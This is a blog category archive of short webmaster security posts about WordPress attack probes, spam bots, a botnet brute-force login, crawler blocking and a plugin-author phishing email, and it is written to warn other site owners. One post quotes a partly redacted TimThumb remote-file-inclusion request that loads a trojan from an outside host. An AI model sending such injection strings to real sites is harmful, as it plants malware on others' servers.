Category Archives: Internet Security
Are We Seeing an End to Timthumb Attacks on WordPress?
Lately we have seen a decline in the number of TimThumb RFI attacks against our WordPress sites. A year ago this was the most common hacking probe logged for every WordPress site we manage. Back then we’d see a lot; from 10 to 50, sometimes more, different sources a day. Hardly a day would go by without at least one hacker looking for the vulnerability.
Over the last 6 months, the number of witnessed attempts has declined. Sometimes we don’t see a single probe looking for the old, vulnerable, timthumb.php / thumb.php script for several days.
Opera User Agent “Bork-Edition”
Have you seen Bork-edition user agent strings? Wondered what browser uses this string? Maybe noticed nearly all traffic to your site with Bork edition in the user agent string is spam and hacking attempts. User agents with Bork-edition are considered by at least one writer among the top 10 spam bots that must be blocked.
There’s several user agents which on first glance look harmless e.g. user agent string Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Just when I thought I’d seen it all, I get some really weird spam e-mail from a webform response. Every possible field filed in with a website URL, or nonsense text. And there are lot’s of fields. Stranger still, the mail form responds to a promotion that ended in October last 2011…
Apparent Botnet Attacked My WordPress Website
What appeared to be a botnet attacked one of my sites (tech.graphicline.co.za) this morning in a brute-force wp-login attempt from multiple IP addresses. This was the most coordinated attack against any of my sites I’ve experienced. Usually the hacker bots I see use up to 6 IP’s in these attacks – 146 IPs is serious stuff…
146 IP’s Used in Simultaneous Attack
The IP’s listed below are the guilty parties to this brute-force login attack on the site. The main attack started at 05h09 GMT this morning (November 25, 2012) and continued until 05h15 GMT. A second but less intense attacked followed; starting from 05h16 GMT tailing off until ending at 05h43 GMT
Hacker Bot FreeWebMonitoring SiteChecker/0.1 Pays a Visit
Bad bot “FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)” paid a visit to one of my websites yesterday from IP address 126.96.36.199 which belongs to Canadian service provider: Canada Montreal Thst Golf Inc.
The full range of IP’s owned by Canada Montreal Thst Golf Inc. is 188.8.131.52 – 184.108.40.206
This bot is not the bot used by freewebmonitoring.com. Their bot is “FreeWebMonitoring SiteChecker/0.2 (+http://www.freewebmonitoring.com/bot.html)”
Baidu and Yandex Bots Forbidden Access
That’s it folk, I have denied access to the Baidu and Yandex web spiders. I don’t want them crawling my sites, I don’t want them crawling my clients’ sites (unless the client wants them to of course). Both these bots do not follow advanced robots.txt disallow rules, and crawl areas of the sites I don’t want indexed… In particular I don’t want them continually searching my sites for non-existent RSS feeds and /trackback urls thus generating excessive page not found errors.
I am becoming stricter with web bots that do not comply with the more advanced robots.txt rules, eg “disallow /feed” and wildcards. Google obeys these rules, Bing obeys these rules, any other worthwhile search engine should also obey these rules.
verify-Compliance_Page | notified-Compliance_Page
I noticed a few 404 page not found errors in activity logs for several sites today using these strings; verify-Compliance_Page?aHR0cDovL3d3dy5ncmFwaGljbGluZS5jby56YS8= and notified-Compliance_Page with the same rubbish string on the end. When I find odd GET requests I invariably try to find out more information about what the ‘visitor’ is trying to do. Are they trying to hack, access forbidden areas, upload malware or post spam…
As far as verify-Compliance_Page and notified-Compliance_Page are concerned, the amount of substantiated information is notable only in it’s scarcity. So for any webmaster who is also looking for this information about these odd GET requests, this is what I was able to establish.
Phishing Scam Targets WordPress Plugin Developers
What may be the first phishing scam specifically targeting WordPress Plugin authors has been discovered. The scam comes in the form of an e-mail claiming the developers plugin has been removed from the WordPress Repository, and tells the plugin author to use the link in the mail to login and change their password.
The e-mail uses the Subject line “[WordPress.org Plugins] Urgent: Your Plugin Has Been Removed” and has this message content
Dear WordPress Plugin Developer,
Unfortunately, a plugin you are hosting has been temporarily removed from the WordPress repository. We are going to manually review your plugin because it has been reported for violating our Terms of Service. If your plugin does not get approved then it will be permanently removed from the WordPress repository.
You can check if your plugin has been approved or rejected at…
This is not an official WordPress email!
Microsoft Security Essentials Under Microscope
A look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from most common threats? Can MSE compete with commercial security applications?
Over the next few months we will see.
Annoyed with Commercial AV Software.
I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too much system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps are able to detect every virus or malware… An example is Trojan Generic 24, which seems to be only detected by AVG (but doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.
Hackers Using Picasa Spoof for Web Malware
Strange looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to inject malware or spam. Examining the details of the referer reveals something like this example /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in string for your safety – leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!
Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.